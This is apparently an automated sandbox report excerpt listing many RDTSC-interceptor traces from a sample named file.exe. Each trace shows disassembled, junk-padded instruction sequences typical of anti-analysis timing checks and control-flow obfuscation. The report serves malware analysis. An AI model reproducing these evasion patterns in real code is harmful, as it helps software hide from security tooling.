                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17D8B second address: D17DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D34B70901h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17DA0 second address: D17E5F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0D344F4AC8h 0x0000000e nop 0x0000000f jmp 00007F0D344F4ABCh 0x00000014 mov ecx, dword ptr [ebp+122D286Eh] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F0D344F4AB8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 mov edi, 29F5356Bh 0x0000003b push E3F758FAh 0x00000040 jmp 00007F0D344F4AC5h 0x00000045 add dword ptr [esp], 1C08A786h 0x0000004c push ecx 0x0000004d mov dword ptr [ebp+122D1CE6h], ecx 0x00000053 pop edi 0x00000054 push 00000003h 0x00000056 push edx 0x00000057 pushad 0x00000058 sub dword ptr [ebp+122D2178h], edi 0x0000005e sub dword ptr [ebp+122D17F6h], esi 0x00000064 popad 0x00000065 pop edi 0x00000066 push 00000000h 0x00000068 jmp 00007F0D344F4AC4h 0x0000006d push 00000003h 0x0000006f push 94DDD486h 0x00000074 push esi 0x00000075 push eax 0x00000076 push edx 0x00000077 js 00007F0D344F4AB6h 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17E5F second address: D17E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17E63 second address: D17ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 2B222B7Ah 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F0D344F4AB8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 jbe 00007F0D344F4AB7h 0x0000002e cld 0x0000002f lea ebx, dword ptr [ebp+12449CACh] 0x00000035 push esi 0x00000036 sub dword ptr [ebp+124454D6h], esi 0x0000003c pop esi 0x0000003d xchg eax, ebx 0x0000003e jmp 00007F0D344F4AC7h 0x00000043 push eax 0x00000044 pushad 0x00000045 push ebx 0x00000046 jmp 00007F0D344F4AC2h 0x0000004b pop ebx 0x0000004c push esi 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F37 second address: D17F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F3D second address: D17F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F0D344F4AB8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F51 second address: D17F6A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f ja 00007F0D34B70908h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F6A second address: D17F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F6E second address: D17F97 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F0D34B70904h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F97 second address: D17F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F9B second address: D17F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F9F second address: D18027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D3672h], ebx 0x0000000e or dword ptr [ebp+122D181Eh], ebx 0x00000014 push 00000003h 0x00000016 or edi, 58CB06EAh 0x0000001c push 00000000h 0x0000001e mov edx, dword ptr [ebp+122D3815h] 0x00000024 push 00000003h 0x00000026 mov di, dx 0x00000029 push C8BB27B5h 0x0000002e push eax 0x0000002f jl 00007F0D344F4ABCh 0x00000035 pop eax 0x00000036 xor dword ptr [esp], 08BB27B5h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F0D344F4AB8h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 mov dword ptr [ebp+12447C8Fh], esi 0x0000005d lea ebx, dword ptr [ebp+12449CB5h] 0x00000063 or dword ptr [ebp+122D1969h], ebx 0x00000069 push eax 0x0000006a pushad 0x0000006b push eax 0x0000006c jmp 00007F0D344F4ABFh 0x00000071 pop eax 0x00000072 push eax 0x00000073 push edx 0x00000074 push edx 0x00000075 pop edx 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18074 second address: D1809B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D34B708F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov esi, dword ptr [ebp+122D38C5h] 0x00000013 push 00000000h 0x00000015 sub dx, 66E7h 0x0000001a push CEBD4130h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1809B second address: D1809F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1809F second address: D180A9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D180A9 second address: D180DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 3142BF50h 0x00000010 mov di, 1AB7h 0x00000014 push 00000003h 0x00000016 sbb dx, 8165h 0x0000001b push 00000000h 0x0000001d push 00000003h 0x0000001f mov cl, bl 0x00000021 push 8ED3D7DFh 0x00000026 push eax 0x00000027 push edx 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D180DE second address: D180E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D180E3 second address: D1813E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 312C2821h 0x0000000f mov si, ax 0x00000012 lea ebx, dword ptr [ebp+12449CC0h] 0x00000018 xchg eax, ebx 0x00000019 jnp 00007F0D344F4ACAh 0x0000001f jmp 00007F0D344F4AC4h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007F0D344F4AC2h 0x0000002d jmp 00007F0D344F4AC1h 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1813E second address: D18144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37978 second address: D3797C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3797C second address: D37999 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B708FFh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F0D34B708F6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37999 second address: D379B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC0h 0x00000007 je 00007F0D344F4AB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37CD5 second address: D37CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37E44 second address: D37E50 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D344F4AB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37E50 second address: D37E55 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37FBC second address: D37FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37FC2 second address: D37FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a jnl 00007F0D34B708F8h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D37FD7 second address: D37FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0D344F4AB6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38121 second address: D3812A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D384F8 second address: D38502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0D344F4AB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38502 second address: D38538 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F0D34B708FCh 0x0000000c jng 00007F0D34B708F8h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d pop eax 0x0000001e push edi 0x0000001f pop edi 0x00000020 popad 0x00000021 pushad 0x00000022 jmp 00007F0D34B708FBh 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38538 second address: D38541 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38693 second address: D38699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E36C second address: D2E374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E374 second address: D2E380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0D34B708F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E380 second address: D2E394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F0D344F4AB8h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E394 second address: D2E398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E398 second address: D2E3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E3A4 second address: D2E3AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E3AA second address: D2E3B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E3B0 second address: D2E3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B4D8 second address: D0B4E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0D344F4AB6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B4E7 second address: D0B4F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38819 second address: D3882F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC1h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38E05 second address: D38E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D38E09 second address: D38E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D390B0 second address: D390B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D390B6 second address: D390BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D390BA second address: D390D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D390D3 second address: D390F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0D344F4ABCh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jmp 00007F0D344F4ABAh 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D390F7 second address: D39103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0D34B708F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D39103 second address: D39108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D40FE3 second address: D40FF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F0D34B708F6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F850 second address: D3F85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41151 second address: D41156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41303 second address: D41307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D41307 second address: D4130D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44F52 second address: D44F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F0D344F4AC0h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4449F second address: D444AA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D444AA second address: D444B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44784 second address: D44788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44DD1 second address: D44DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44DD5 second address: D44DF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70903h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F0D34B708FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47AFF second address: D47B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 jns 00007F0D344F4AC2h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47B1C second address: D47B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47DAF second address: D47DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47DB4 second address: D47DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0D34B708F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F0D34B708FCh 0x00000016 jns 00007F0D34B708F6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47FD6 second address: D47FF9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0D344F4AC3h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47FF9 second address: D47FFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47FFD second address: D48003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D487CF second address: D487F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70909h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D487F2 second address: D487F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D487F6 second address: D487FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48A6A second address: D48A74 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48C03 second address: D48C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D34B708FCh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F0D34B708FAh 0x00000015 ja 00007F0D34B708F6h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48C2B second address: D48C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48C31 second address: D48C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48C35 second address: D48C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F0D344F4AB8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jg 00007F0D344F4ABCh 0x00000029 sub esi, dword ptr [ebp+122D36CDh] 0x0000002f xchg eax, ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F0D344F4AC1h 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48C86 second address: D48CBD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0D34B7090Eh 0x00000008 jmp 00007F0D34B70908h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F0D34B708FBh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D48CBD second address: D48CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49229 second address: D4922D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4922D second address: D49231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49231 second address: D49289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F0D34B708FCh 0x0000000e call 00007F0D34B708FBh 0x00000013 jmp 00007F0D34B708FCh 0x00000018 pop edi 0x00000019 pop esi 0x0000001a push ebx 0x0000001b push ebx 0x0000001c mov di, ax 0x0000001f pop edi 0x00000020 pop esi 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 pop esi 0x00000025 push 00000000h 0x00000027 jmp 00007F0D34B70908h 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e push ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49289 second address: D49292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
